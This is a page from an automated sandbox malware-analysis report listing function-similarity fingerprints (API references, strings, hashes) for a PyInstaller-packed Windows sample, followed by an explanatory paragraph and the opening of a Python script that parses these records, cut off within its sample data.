                                                                                                                                                                                                      • String ID: BZ2Decompressor
                                                                                                                                                                                                      • API String ID: 2980520244-1337346095
                                                                                                                                                                                                      • Opcode ID: afed0f35918e07c7ed392c872454de98ee5c60d2288c0fb2d16eeed887e30540
                                                                                                                                                                                                      • Instruction ID: 3d76b7d10c1d02cd531544358762cf3ee222a2b173a0ad7698b91ac6ad589791
                                                                                                                                                                                                      • Opcode Fuzzy Hash: afed0f35918e07c7ed392c872454de98ee5c60d2288c0fb2d16eeed887e30540
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B21E5A3A09A8691EA508F2EEC40579A7B4FB44B94F488032DF4E47774DE7CEC95C308
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B41F
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B43E
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B466
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B477
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B488
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Dealloc$Module_State
• String ID:
• API String ID: 3434497292-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
• Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: Module_$FromModuleSpecTypeType_$State
• String ID:
• API String ID: 1138651315-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                      • Instruction ID: 50e1d1209a7165d453bee2a0231e885041ac78346e44468ad3a2f770e2c18d7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C491B132A08A8685FB79AF24D4507BDB791AB40B94FC44336DA79473D5DF3CE40A83A1
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                      • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                      • Instruction ID: 099db035078488b178ef4e75341e2ff237f372823fdb75a7423a4ba6f501a310
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9881C432E0C2C286F7BC6F2581102F8B6E0AB51748FD99235DA39972C5DF2DE90183E1
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func
                                                                                                                                                                                                      • String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
                                                                                                                                                                                                      • API String ID: 711238415-3357347091
                                                                                                                                                                                                      • Opcode ID: f92f81069268f452d2bc39fb51a334a3de6d6541b7d8f5fa574193166bce348c
                                                                                                                                                                                                      • Instruction ID: 7d8c6a0623b099631f9a3d73cc211cab5842a35c6efb82d1b05207642395eb35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f92f81069268f452d2bc39fb51a334a3de6d6541b7d8f5fa574193166bce348c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 666170A7B1A61646E620AF3EE8056A9B350FB85F84F549035DF0B07766CF7DE802CB44
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                      • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction ID: d489551160167ab9b0a6567a1cfcfaaeeb678087ee9f8f5455c1602c2fa9376d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D51A232B196818ADB14AF15E044BB8A7D1FB44B98F914230DA7D877C8EF3CE845CB90
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                      • Opcode ID: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                      • Instruction ID: 60545f858aa65fd9ca9168f6b2333019c5f805f4338b4330fb18e3e9f9121f98
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E051C4FAB196029AEB54CB29E048638B791FB84B98F544139DB4E47B88DF7CE941C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                      • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction ID: 17ab65d3ae5609a70c0cdbac56963b814ad9c94e18f717db7be9dd65e50831d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1561B432908BC586D760AB15E4407EAFBA0FB89784F444325EBAD07B95DF7CD191CB50
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
• Instruction ID: 6ed6950d718bc4685e13a8d95892edc7af1d3145f7b4974e79e59d24daaf7f10
• Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
• Instruction Fuzzy Hash: 26518E329086C286EB64AE2194443A8B6E0FB59B94F944336EABD47BD5CF3CE450C791
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: abort$CreateFrameInfo__except_validate_context_record
• String ID: csm
• API String ID: 444109036-1018135373
• Opcode ID: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
• Instruction ID: a07aa9fd2487b20efdeb74e9701057ec17aca8a4734c00c9016a856a313bf8e3
• Opcode Fuzzy Hash: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
• Instruction Fuzzy Hash: A65150FA71874286E620EF69E44926D7BA4FB89BA0F140535DB8D07B55DF3CE460CB04
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: NameName::
• String ID: %lf
• API String ID: 1333004437-2891890143
• Opcode ID: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
• Instruction ID: 4e6fd124b2f2a7a5218ff2b9ba7cbe556c2964a6a400605ba9910f86aa1c5b15
• Opcode Fuzzy Hash: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
• Instruction Fuzzy Hash: B431D6E5B08B8685FA11DB7AE8991BA7364FF45780F444132EB5E53395DE3CE502C708
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF7FF58352C,?,00000000,00007FF7FF583F23), ref: 00007FF7FF587F22
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
• Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
• Instruction ID: 32be83ce6d4a459b06ada111c58a9cbcabf97a4ca1fea3de9b4d79cda10e9477
• Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
• Instruction Fuzzy Hash: D531B061619AC145EB21AB21F8507EAA354FF88BE4F840331EE7D47BC9EE2CD645C790
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
• Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
• Instruction ID: cd390d2fd8c64561ad633427d078f8982fb251811455d2cae1e41af6ac5b484e
• Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
• Instruction Fuzzy Hash: CA21E572708B8192E710AB14F8447EAB7A0FB88780F800232EEAD537A5DF3CD255C790
APIs
  • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
• terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD4112E
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: abortterminate
• String ID: MOC$RCC$csm
• API String ID: 661698970-2671469338
• Opcode ID: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
• Instruction ID: 554f642da4ab28a5db7cb3dd76db8d78241d499f195cd5c159895385abe14e0d
• Opcode Fuzzy Hash: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
• Instruction Fuzzy Hash: BFF04FFAB18606C2E7509FB9E18A07C3764FB48F40F095132D7480625ADF3CD490C705
APIs
• PyLong_AsUnsignedLongLong.PYTHON313(?,?,00000006,00007FFBBB61075D), ref: 00007FFBBB6118C9
• PyErr_Occurred.PYTHON313(?,?,00000006,00007FFBBB61075D), ref: 00007FFBBB6118D2
• PyErr_SetString.PYTHON313(?,?,00000006,00007FFBBB61075D), ref: 00007FFBBB6159A9
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Err_Long$Long_OccurredStringUnsigned
• String ID: Value too large for uint32_t type
• API String ID: 944333170-1712686559
• Opcode ID: 8ac7a20ae80ccca81888b0cc09755ddc2b0cb9c17cfce0893e9d75e9ca9ceff1
• Instruction ID: a0aae4c030610f494001faa2497532e16ab460ee97a78d6992e7791c46e7d6b9
• Opcode Fuzzy Hash: 8ac7a20ae80ccca81888b0cc09755ddc2b0cb9c17cfce0893e9d75e9ca9ceff1
• Instruction Fuzzy Hash: 53F0B2A1B1864385EA549B39E884178B3A0BB48B84B18E434DB1F46265DE3CEC559308
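The entries above are per-function fingerprint records from the report's IDA plugin data: the image at 0x7FF7FF580000 carries the CreateDirectoryW helper and the `[PYI-%d:%ls]` message routine (strings consistent with the PyInstaller bootloader flagged in the report's signatures), the image at 0x7FFBBCD40000 holds CRT exception-handling and abort/terminate code, and the image at 0x7FFBBB600000 is a Python 3.13 extension module. As an added example that is not part of the Joe Sandbox report or its tooling, the Python below parses entries in this layout into records, cross-checks the fields that must agree within one entry (Opcode ID against Opcode Fuzzy Hash, which are identical in every entry on this page; the base address embedded in the snapshot file name against the dump Offset; each API call site against the image base) and groups the referenced imports by loaded image. The section and bullet layout is inferred from the visible entries only; the embedded sample is two entries copied from this page with their Associated dump lines omitted.

```python
"""Parse the Joe Sandbox function-similarity entries listed on this page.
Added example, not part of the Joe Sandbox report or its tooling; the section
and field layout is inferred from the visible entries only."""
import re
from dataclasses import dataclass, field

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<call>.+?),?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<file>[^,\s]+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
SNAP_RE = re.compile(r"^hcaresult_\d+_\d+_(?P<base>[0-9a-f]+)_.+\.jbxd$")
# Constructed input: two entries copied from this page, "Associated" dump lines omitted.
SAMPLE = """\
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF7FF58352C,?,00000000,00007FF7FF583F23), ref: 00007FF7FF587F22
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CreateDirectory
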